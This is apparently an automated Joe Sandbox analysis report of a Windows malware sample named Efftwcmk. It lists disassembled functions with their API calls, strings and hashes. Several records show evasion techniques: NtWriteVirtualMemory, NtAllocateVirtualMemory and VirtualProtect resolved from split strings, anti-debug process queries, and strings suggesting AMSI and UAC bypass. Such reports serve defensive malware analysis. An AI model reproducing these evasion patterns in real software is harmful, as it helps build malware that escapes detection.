Opcode Fuzzy Hash: 4c1311eb5434b8680748afc131119d4824039d95005a30db277687d5824be99f
Instruction Fuzzy Hash: 9C43EF75B501598BDB28FB64CD80ADEB3BAFF85304F1045E6E008A7654DB70AE99EF10

Function 02C75A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C70000,02C9A790), ref: 02C75A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75AEE
RegQueryValueExA.ADVAPI32 ref: 02C75B37
RegQueryValueExA.ADVAPI32 ref: 02C75B55
RegCloseKey.ADVAPI32(?), ref: 02C75B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C75BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C75BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C75BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C75C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C75C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C75C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C75C97

Strings

Software\Borland\Delphi\Locales, xrefs: 02C75AE4
Software\Borland\Locales, xrefs: 02C75AA8, 02C75AC6

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: e1bdda62ac6f0270a1f4bdb2ce0b731660733788cb9851dca312ad586d8557f7
Instruction ID: 7288f14fa6640d5259336a3f0f65ce3746f7c28728a4f1bfba5985f0f55c0b83
Opcode Fuzzy Hash: e1bdda62ac6f0270a1f4bdb2ce0b731660733788cb9851dca312ad586d8557f7
Instruction Fuzzy Hash: 56518571E4024C7EFB25D6A4CC46FEF7BAD9B48784F8401A5AA04E61C1DBB49B449FA0

Function 02C87A72 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87AB8
GetProcAddress.KERNEL32(00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ABE
NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ADC

Strings

ntdll, xrefs: 02C87AB3
irtualMemory, xrefs: 02C87A8D
NtWriteV, xrefs: 02C87AA0

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: NtWriteV$irtualMemory$ntdll
API String ID: 4260932595-852282483
Opcode ID: da7f9603664c934a8a725272b1d9c85410aabc1c5f2d2d1698517c45547aa022
Instruction ID: 11bbcf56a5f7f31fd701fbdaefb757180d71b628688fda87d0bcafc06ba912e5
Opcode Fuzzy Hash: da7f9603664c934a8a725272b1d9c85410aabc1c5f2d2d1698517c45547aa022
Instruction Fuzzy Hash: C4014FB5640204BFD710EFA8DC51EAB77EDEB48714B614864F805D3A00E635ED149B60

Function 02C87A74 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87AB8
GetProcAddress.KERNEL32(00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ABE
NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02C87AF8,?,?,00000000), ref: 02C87ADC

Strings

ntdll, xrefs: 02C87AB3
irtualMemory, xrefs: 02C87A8D
NtWriteV, xrefs: 02C87AA0

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleMemoryModuleProcVirtualWrite
String ID: NtWriteV$irtualMemory$ntdll
API String ID: 4260932595-852282483
Opcode ID: 76add324497cea4de737b14661049dc42315bd06f38ff56f07bb4f4edcb47c02
Instruction ID: 6cb41c540d328190442c8660e3649d1a747a91fd1f4f6ca4581b4784aa447549
Opcode Fuzzy Hash: 76add324497cea4de737b14661049dc42315bd06f38ff56f07bb4f4edcb47c02
Instruction Fuzzy Hash: 35014FB5640204AFD710EFA8DC51EAB77EDEB48714B614864F805D3A00E635ED149B60

Function 02C8D6D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 02C8D6E4
GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D6F6
NtQueryInformationProcess.NTDLL(FFFFFFFF,0000001F,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D715

Strings

ntdll, xrefs: 02C8D6DF
ZwQueryInformationProcess, xrefs: 02C8D6F0

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleInformationModuleProcProcessQuery
String ID: ZwQueryInformationProcess$ntdll
API String ID: 3384173408-191046249
Opcode ID: 726d82e8431fa40872568732d8a37e668c01dea3ad91157ea0d4120ada539235
Instruction ID: 4b34a657af9cd380aaa687ed400f8a30d1b9273e06a4f118308b3412db2007be
Opcode Fuzzy Hash: 726d82e8431fa40872568732d8a37e668c01dea3ad91157ea0d4120ada539235
Instruction Fuzzy Hash: 2BF0E930D0425C7AEB10BAF98C84BEDB7BC9B05368F5483D8A537A21C1D7705340CB51

Function 02C8D654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
librarynativeloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 02C8D664
GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D676
NtQueryInformationProcess.NTDLL(FFFFFFFF,00000007,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 02C8D695

Strings

ZwQueryInformationProcess, xrefs: 02C8D670
ntdll, xrefs: 02C8D65F

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleInformationModuleProcProcessQuery
String ID: ZwQueryInformationProcess$ntdll
API String ID: 3384173408-191046249
Opcode ID: 32d93a8625a794e606a601fbeed052e3938b609c5eca86a0a048af6315ba2d6f
Instruction ID: 5f49e1346918720bf83afa4f14805fd4e90f14b7bf980a0df9da83908b30c3b1
Opcode Fuzzy Hash: 32d93a8625a794e606a601fbeed052e3938b609c5eca86a0a048af6315ba2d6f
Instruction Fuzzy Hash: 0FF0B470CC421CB9E710B6B98C48BECBBAC5B05328F6487E0A57AA21C0D77417448B11

Function 02C87922 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957

Strings

C:\Windows\System32\ntdll.dll, xrefs: 02C8792C
NtAllocateVirtualMemory, xrefs: 02C87927

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: 3bf0975f38b41d949bf39253536b156c8af1774ba39b9e0014caa7f67cdbd310
Instruction ID: cd2502888ff3ccd2d1e7f1c7a909a23806114e8219f220cd59063c14e9e5095c
Opcode Fuzzy Hash: 3bf0975f38b41d949bf39253536b156c8af1774ba39b9e0014caa7f67cdbd310
Instruction Fuzzy Hash: 2DE0E5B6680208BBDB00EE98E841EDA77ACAB08714F108415BA09C7200D674EA108BA4

Function 02C87924 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87931
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02C87937
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C87957

Strings

C:\Windows\System32\ntdll.dll, xrefs: 02C8792C
NtAllocateVirtualMemory, xrefs: 02C87927

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: e503cff665c082d7a07791c6b04839605eb5d555d63f110fd09972d8a06d34e8
Instruction ID: 0c576de514b0bc924f344697ce5d59d7189a9f362ef76abe2677a37a8cbb9e9d
Opcode Fuzzy Hash: e503cff665c082d7a07791c6b04839605eb5d555d63f110fd09972d8a06d34e8
Instruction Fuzzy Hash: FEE01AB6580308BBDB00EF98E841EDB77ACAB0C714F108415BA09C7200D774EA10CBB4

Function 02C8C7B8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C74ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02C74EDA

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C7F3
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02C8C888), ref: 02C8C823
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02C8C838
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02C8C864
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02C8C86D

Part of subcall function 02C74C0C: SysFreeString.OLEAUT32(02C8D3D4), ref: 02C74C1A

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 7d60823d912b667c01d6634be0bf35508398803d4407be93a46f8ef548376d22
Instruction ID: 42e761c6c512dda73da1eaeae490faf54e0120517acb688af03fdcc3267bed50
Opcode Fuzzy Hash: 7d60823d912b667c01d6634be0bf35508398803d4407be93a46f8ef548376d22
Instruction Fuzzy Hash: B621C175B503087AEB15EAE4CC42FDEB7BDEB08704F504462B604F71C0E774AA459B65

Function 02C8CC94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(?,02C8D7AC,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8CCA2
Sleep.KERNEL32(00000000,?,02C8D7AC,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8CCB4
GetTickCount.KERNEL32(00000000,?,02C8D7AC,00000000,02C97487,?,?,00000269,00000000,00000000), ref: 02C8CCB9

Strings

500, xrefs: 02C8CCA9

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID: 500
API String ID: 4250438611-612300854
Opcode ID: 6ff66197e3fc1b560301f9cc9eeb25704e7587a30391feff6b9a937f77822739
Instruction ID: 14f9bbcc17b0e8c2ccab09aeee22d2f1811fc22f84402a1ebe1dd393248b80fc
Opcode Fuzzy Hash: 6ff66197e3fc1b560301f9cc9eeb25704e7587a30391feff6b9a937f77822739
Instruction Fuzzy Hash: 59C08CEA291C0646DA007EF82AD49AB024E8B5032A7213D72E20AC6200C92AC7413A75

Function 2D2632B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002,00000000,Pk)-N)-,2D266136,00000003), ref: 2D2632D6
TerminateProcess.KERNEL32(00000000), ref: 2D2632DD
ExitProcess.KERNEL32 ref: 2D2632EF

Strings

Pk)-N)-, xrefs: 2D2632B7

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: Pk)-N)-
API String ID: 1703294689-771429351
Opcode ID: 889adc73c199acae6338fd82df4f1de88b6578f2d492c4ebd2d30972729f9bb7
Instruction ID: 6529d7d81ea6bf80b0f65bcdac7db19ad93bcca1ef03c681504a508acebe32ef
Opcode Fuzzy Hash: 889adc73c199acae6338fd82df4f1de88b6578f2d492c4ebd2d30972729f9bb7
Instruction Fuzzy Hash: 37E04F31440344ABDF116F64CD0CA993BB9FB45645F044014FA4566231DB3AED81CAE4

Function 2D224E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,2D294EF8,Pk)-N)-,00000000,2D294EF8,2D224CA8,00000000,00000000,00000000,?,2D294EF8,?), ref: 2D224E38
SetEvent.KERNEL32(00000000), ref: 2D224E43
CloseHandle.KERNELBASE(00000000), ref: 2D224E4C
closesocket.WS2_32(FFFFFFFF), ref: 2D224E5A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2D224E91
SetEvent.KERNEL32(00000000), ref: 2D224EA2
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 2D224EA9
SetEvent.KERNEL32(00000000), ref: 2D224EBA
CloseHandle.KERNEL32(00000000), ref: 2D224EBF
CloseHandle.KERNEL32(00000000), ref: 2D224EC4
SetEvent.KERNEL32(00000000), ref: 2D224ED1
CloseHandle.KERNEL32(00000000), ref: 2D224ED6

Strings

Pk)-N)-, xrefs: 2D224E28

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID: Pk)-N)-
API String ID: 3658366068-771429351
Opcode ID: 2783b4fc5d02adb0cd23ea08208704a19dd05f845d0efe9b3399ec3427e3e55f
Instruction ID: 87fc8fb42493001f38afc3d6003fe616294b44450010188c6be2d6abd4aeab41
Opcode Fuzzy Hash: 2783b4fc5d02adb0cd23ea08208704a19dd05f845d0efe9b3399ec3427e3e55f
Instruction Fuzzy Hash: 48213931044B009FEB316B26CC48B17BBB6FF51736F104A18E2E221AF0CB65B851DB58

Function 02C9342A Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 946
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02C87DF4: LoadLibraryW.KERNEL32(?,00000000,02C87EC3), ref: 02C87E24
Part of subcall function 02C87DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02C87EC3), ref: 02C87E2A
Part of subcall function 02C87DF4: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,02C87EC3), ref: 02C87E43

Part of subcall function 02C8D310: RegOpenKeyA.ADVAPI32(?,00000000,02CAF644), ref: 02C8D354
Part of subcall function 02C8D310: RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000000), ref: 02C8D38C
Part of subcall function 02C8D310: RegCloseKey.ADVAPI32(00000000), ref: 02C8D397

WinExec.KERNEL32 ref: 02C93D37

Part of subcall function 02C8A18C: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02C8A24F

RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02CAF358,02C974BC,UacScan,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC,OpenSession,02CAF358,02C974BC), ref: 02C942B9

Strings

UacInitialize, xrefs: 02C93CA3
C:\Windows\System32\, xrefs: 02C93D21
ScanString, xrefs: 02C93436, 02C9392A, 02C93DC4, 02C9422B
OpenSession, xrefs: 02C9352E, 02C9373A, 02C938AE, 02C93A22, 02C93C27, 02C93E40, 02C93EE3, 02C94076, 02C94346
ScanBuffer, xrefs: 02C93626, 02C93B1A, 02C93BAB, 02C93FDB, 02C9416E, 02C942CA, 02C9443E
Initialize, xrefs: 02C934B2, 02C93A9E
UacScan, xrefs: 02C935AA, 02C937B6, 02C93832, 02C939A6, 02C93D48, 02C93F5F, 02C940F2, 02C943C2
C:\Users\Public\, xrefs: 02C93696

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
API String ID: 897696978-872072817
Opcode ID: 600888b6eae5c9492297a6ac984776a4775249821ce38baf810ab39f7696465f
Instruction ID: 40620c3c0c70f1a2fd9c2a0e9fe652c37a2230e6339f866ad49ac2b2fd1baaef
Opcode Fuzzy Hash: 600888b6eae5c9492297a6ac984776a4775249821ce38baf810ab39f7696465f
Instruction Fuzzy Hash: 7E92D075B901598FDB28EBA8CD80E9EB7BABF85304F1045E6E009A7254DF30AE55DF10

Function 2D26AC49 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$%-,2D25EA24,?,?,Pk)-N)-,2D26AE9A,00000001,00000001,73E85006), ref: 2D26ACA3
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,Pk)-N)-,2D26AE9A,00000001,00000001,73E85006,?,?,?), ref: 2D26AD29
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 2D26AE23
__freea.LIBCMT ref: 2D26AE30

Part of subcall function 2D266137: RtlAllocateHeap.NTDLL(00000000,2D2552BC,?,?,2D258847,?,?,00000000,2D296B50,?,2D22DE62,2D2552BC,?,?,?,?), ref: 2D266169

__freea.LIBCMT ref: 2D26AE39
__freea.LIBCMT ref: 2D26AE5E

Strings

$%-, xrefs: 2D26AC5B
Pk)-N)-, xrefs: 2D26AC4B

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID: $%-$Pk)-N)-
API String ID: 1414292761-3860729615
Opcode ID: d33d15ab41c7263690cd922c3a8cc4555db6a635d5d5ae85bbafe7652637d0fc
Instruction ID: 66053b0045e0567ed7cf1846a17a06e9bc32b77496e13084319b8b111af0cdc2
Opcode Fuzzy Hash: d33d15ab41c7263690cd922c3a8cc4555db6a635d5d5ae85bbafe7652637d0fc
Instruction Fuzzy Hash: 3851B172698317ABEB158E64CC80EBB77A9EB44650F114679FE14F6180EB35ECD086F0

Function 02C71724 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02C717D0
Sleep.KERNEL32(0000000A,00000000), ref: 02C717E6

Strings

T, xrefs: 02C718AC, 02C718CE, 02C719D8, 02C719EE

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: T
API String ID: 3472027048-1611120390
Opcode ID: b642279cd7e28c1d6edd52a6053f3f4e0b0cddc87ea4ef65c46fefad9a3ff7fd
Instruction ID: 7a5592dcf6583aa1435c099fa5e690510ad44703009337fd673964d2d9099858
Opcode Fuzzy Hash: b642279cd7e28c1d6edd52a6053f3f4e0b0cddc87ea4ef65c46fefad9a3ff7fd
Instruction Fuzzy Hash: CAB1F072A003518FCB15CF29D884366BBE1EB85368F1D87AED45DCB385DBB09652CB90

Function 02C71A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?), ref: 02C71B17
Sleep.KERNEL32(0000000A,00000000,?), ref: 02C71B31

Strings

T, xrefs: 02C71BF4, 02C71C3E

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: T
API String ID: 3472027048-1611120390
Opcode ID: e4447ac13f5b47de3407be400ced21773e6d7958a8b0972661acd5070481b79b
Instruction ID: 3a9d7958bf1a1bad27c88ad196626ddbc8f135972a6577b5749e288c101ba0ab
Opcode Fuzzy Hash: e4447ac13f5b47de3407be400ced21773e6d7958a8b0972661acd5070481b79b
Instruction Fuzzy Hash: 1C51CFB1A512408FD715CF6CC984766BBD5EB85328F1C86AED44CCB292E7F0C645CBA1

Function 02C87D2C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D6D
GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D73
VirtualProtect.KERNELBASE(?,?,?,?,00000000,kernel32,00000000,00000000,02C87DB1,?,?,00000000,00000000), ref: 02C87D8D

Strings

irtualProtect, xrefs: 02C87D45
kernel32, xrefs: 02C87D68

Memory Dump Source

Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID: irtualProtect$kernel32
API String ID: 2099061454-2063912171
Opcode ID: 73e54f1912c0135d1018583359ab436950eec63963a8e987f909b1b3b09fc7ed
Instruction ID: 3c861b0b8816e24f5595dae5d424cb625e67de50d959b9ac910d36f83fff8830
Opcode Fuzzy Hash: 73e54f1912c0135d1018583359ab436950eec63963a8e987f909b1b3b09fc7ed
Instruction Fuzzy Hash: EE014479640604BFE710FFA8DC41E9EB7FDEB49714F618461F914D3680E634A9149F24

Function 2D268566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,2D26850D,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue), ref: 2D268598
GetLastError.KERNEL32(?,2D26850D,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue,2D27F160,2D27F168,00000000,00000364,?,2D2682E7), ref: 2D2685A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,2D26850D,?,00000000,00000000,00000000,?,2D268839,00000006,FlsSetValue,2D27F160,2D27F168,00000000), ref: 2D2685B2

Memory Dump Source

Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true

Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: b44af31d7faf1ade206ce4ae8c9edb05d65137a017e3c7825d4502a60d5a0ce7
Instruction ID: 3b93f3d94c99f923501b6a5d043a969e8d62ed675b42615db29467b1d66810cd
Opcode Fuzzy Hash: b44af31d7faf1ade206ce4ae8c9edb05d65137a017e3c7825d4502a60d5a0ce7
Instruction Fuzzy Hash: BF01D8326563239BD7215A688C48F57B768BF05AA57124524ED05F72C0FB24D940CEF8

Function 2D268BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,2D25CE55), ref: 2D268C24

